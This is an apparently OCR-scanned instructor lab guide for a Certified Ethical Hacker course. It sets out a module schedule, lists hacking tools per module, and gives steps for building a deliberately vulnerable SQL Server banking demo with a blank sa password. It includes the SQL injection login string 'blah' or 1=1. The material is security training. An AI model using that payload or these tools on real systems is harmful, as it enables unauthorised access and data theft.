Test the "Matrix'' screen saver. 
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Training Duration and Breakdown 

Number of recommended days required for CEH training: 5 (9:00 - 5:00) class 
Topics Breakdown: 

Day 1 

Ethics and Legal Issues 
Footprinting 
Scanning 
Enumeration 

Day 2 

System Hacking 
Trojans and Backdoors 

Day 3 

Sniffers 

Denial of Service 
Social Engineering 
Session Hijacking 

Day 4 

Hacking Web Servers 

Web Application Vulnerabilities 

Web Based Password Cracking Techniques 

SQL Injection 

Hacking Wireless Networks 
Day 5 

Virus and Worms 

Hacking Novell (Optional Module) 

Hacking Linux 

IDS, Firewalls and Honeypots, Buffer Overflows 
Cryptography 
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Lab Exercises 

Practice and understand how these tools work by reading the 
documentation accompanying the tool. 

Conduct the following module exercises in the classroom. 



Install Command Prompt Here tool. 

This shell extension adds a CMD Prompt Here command to the 
context menu that is available when you right-click in the Folders 
(left) pane of Windows Explorer. Selecting this option from the 
context menu creates a new command-prompt session with the 
same path as that of the object that is right-clicked. 

Installing CmdHere 

To install CmdHere: 

1 . In Windows Explorer, navigate to the <CD- 
ROM>\Miscellaneous 

2. Right-click DOSHERE.INF. 

3. On the resulting pop-up menu, click Install. 
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Now you can open any directory in command prompt. For example 
to open < CD-ROM >\System Hacking\ directory in Command 
prompt, simply right-click the System Hacking directory and select 
Command Prompt Here 
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Module 1: Legality 

■ Ask the student to read the "Ethical Hacking Agreement.doc" 

Module 2: Footprinting 

■ Whois (Linux CD-ROM) 

■ http : / /tuco ws . com 

■ Hacking Took Sam Spade 

■ NSLookup 

■ ARIN 

■ Traceroute 
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■ Hacking Tool: NeoTrace 

■ Visual Route 

■ Visual Lookout 

■ Hacking Tool: Smart Whois 

■ Hacking Tool: eMailTracking Pro 

■ Hacking Tool: MailTracking.com 

Module 3: Scanning 

■ Hacking Tool: Netscan Tools Pro 2000 

■ Hacking Tool: Hping2 (Linux CD-ROM) 

■ Hacking Tool: netcraft.com 

■ Hacking Tool: nmap (Linux CD-ROM) 

■ Hacking Tool: HTTrack Web Copier 

■ SolarWinds Toolset 

■ NeoWatch 

■ Hacking Tool: Cheops (Linux CD-ROM) 

Module 4: Enumeration 

■ NetBIOS Enumeration 

■ Hacking Tool: DumpSec 

■ Hacking Tool: NAT 

■ Hacking Tool: User2SID 

■ Hacking Tool: SID2User 

■ Hacking Tool: Enum 

■ Hacking Tool: Userlnfo 

■ Hacking Tool: GetAcct 



Module 5: System Hacking 

■ Legion 

■ VisualLast 

■ Hacking Tool: LophtCrack 



■ Hacking Tool: GetAdmin 

■ Hacking Tool: Rootkit 

■ MD5 Checksum utility 

■ Auditpol 

■ Hacking Tool: Elslave 

■ Hacking Tool: Winzapper 

■ Hacking Tool: Evidence Eliminator 

■ NTFS File Streaming 

■ Hacking Tool: Snow 

■ Hacking Tool: Camera/Shy 



Module 6: Trojans and Backdoors 

■ Hacking Tool: Tini 

■ Hacking Tool: Netcat 

■ Hacking Tool: NetBus 

■ Packaging Tool: Microsoft WordPad 

■ Hacking Tool: Whack a Mole 

■ fPort 

■ TCPView 

■ Process Viewer 



Module 7: Sniffers 

■ Hacking Tool: Ethereal (Linux CD-ROM) 

■ Hacking Tool: Ettercap (Linux CD-ROM) 

■ Hacking Tool: EtherPeek 

■ Hacking Tool: ArpSpoof (Linux CD-ROM) 

■ Hacking Tool: DSniff (Linux CD-ROM) 

■ Hacking Tool: Macof (Linux CD-ROM) 

■ Hacking Tool: mailsnarf (Linux CD-ROM) 
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■ Hacking Tool: URLsnarf (Linux CD-ROM) 

■ Hacking Tool: Webspy (Linux CD-ROM) 

■ Hacking Tool: WebMiTM (Linux CD-ROM) 

■ Hacking Tool: Cain and Abel 

■ Hacking Tool: Packet Crafter 

■ Hacking Tool: WinSniffer 



Module 8: Sniffers 

■ Hacking Tool: Ping of Death 

■ Hacking Tool: FreakSS 

Module 9: Social Engineering 

■ Ask the student to read "Social Engineering-story.pdf' 

■ Play the Kevin Mitnick Video 

■ Demonstrate Hotmail Social Engineering 



Module 10: Session Hijacking 

■ Hacking Tool: T-Sight 

■ Remote TCP Session Reset Utility 



Module 11: Hacking Web Servers 

■ Hacking Tool: Jill32 

■ Hacking Tool: IISs-Koei 

■ Hacking Tool: IISsHack 

■ Network Tool: LogAnalyzer 

■ Hacking Tool: IISExploit 



■ Hacking Tool: WB 

■ UpdateExpert 

■ Gaels utility 

■ Network Tool: Whisker 

■ N-Stealth Scanner 

■ Hacking Tool: Weblnspect 

■ Network Tool: Shadow Security Scanner 



Module 12: Web Application Vulnerabilities 

■ Using Google to Inspect Applications 

■ Hacking Tool: Instant Source 

■ Hacking Tool: Jad 

■ Hacking Tool: Lynx 

■ Hacking Tool: Wget 

■ Hacking Tool: Black Widow 

■ Hacking Tool: WebSleuth 



Module 13: Web Based Password Cracking 
Techniques 

■ Hacking Tool: WebGracker 

■ Hacking Tool: Brutus 

■ Hacking Tool: ObiWan 

■ Hacking Tool: Munga Bunga 

■ Hacking Tool: Varient 

■ Hacking Tool: PassList 

■ Hacking Tool: GookieSpy 

■ Hacking Tool: SnadBoy 
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Module 14: SQL Injection (See How to setup the SQL 
Demo scripts) 

■ blah' or 1=1 

■ Hacking Tool: SQLDict 

■ Hacking Tool: SQLExec 

■ Hacking Tool: SQLbf 

■ Hacking Tool: SQLSmack 

■ Hacking Tool: SQL2.exe 

Module 15: Hacking Wireless Networks 

■ Hacking Tool: NetTumbler 

■ Hacking Tool: AirSnort 

■ Hacking Tool: AiroPeek 

■ Hacking Tool: WEP Cracker 

■ Hacking Tool: Kismet 

■ WIDZ- Wireless IDS 

Module 16: Virus and Worms 

■ How to write your own Virus? 

Module 17: Novell Hacking 

■ Novell Hacking is Optional 

Module 18: Linux Hacking 

■ HPing2 as Trojan 

■ Hunt 

■ Nessus 

■ Advanced Nmap 



■ Linux Rootkits 

■ IPChains and IPTables 



Module 19: IDS, Firewalls and Honeypots 

■ SNORT 

■ Hacking Tool: fragrouter 

■ Hacking Tool: TCPReplay 

■ Hacking Tool: SideStep 

■ Hacking Tool: NIDSbench 

■ Hacking Tool: ADMutate 

■ Honeypot Trapserver 

Module 20: Buffer Overflows 

■ Writing your own Buffer Overflow Exploit in C 

■ StackGuard 

■ Immunix 



Module 21: Cryptography 

■ PGP 

■ SSH 

■ Encryption Cracking Techniques 
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How to setup the SQL Demo Scripts for SQL 
Injection IVIodule 



1 . The SQL Demo scripts are located in the directory 
<CD-ROM>\Module 14 - SQL Injection\SQL demo 
scripts 

2. Make you have SQL Server 2000 is installed. 

3. The default user account/password for SQL Server 
should be sa and no password 

4. Create the Juggybank database. Execute the script 
juggybank.sql script located in <data> directory using 
SQL Query Analyzer 

5. Setup a System DSN in control panel name it as 
juggybank. The login.asp refers to this DSN for 
accessing the database. 

6. Populate the Userinfo table with data from juggybank- 
userinfo-data.txt file manually or using the bcp import 
utility. 

7. Populate the CreditCard table with data from 
juggybank-creditcard-data.txt file 

8. Set SQL Server to Mixed Authentication mode using 
SQL Server Enterprise Manager. 

9. Publish the <CD-ROM>\Module 14 - SQL 
Injection\SQL demo scripts in IIS as virtual directory 
called SQLInjection. 

10. Ensure lUSR COMPUTERNAME account has read 
access to all the files in this virtual directory. 

1 1 . Configure SQLInjection virtual directory for directory 
browsing in IIS. 
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12. Test the script by running the following in Internet 
Explorer: 

o http://localhost/sqlinjection/index.htm 
o http://localhost/sqlinjection/client.htm 

■ Login in as Usemame joker with 
password joker 

-or- 

Login in as blah ^ or 1=1 

■ You should see bank's Account 
Summary page 

o http://localhost/sqlinjection/client2.htm 

■ This URL contains larger Login input 
fields. You can try advanced SQL 
injection techniques by using this page 
like resetting IIS etc 

o If you don't see the bank page then it must be 
permission problem. Check your settings again. 



Assistance: 

If you have problems or require assistance in setting up 
the Lab for your CEH class, please e-mail 
support (S)eccounciLorg 
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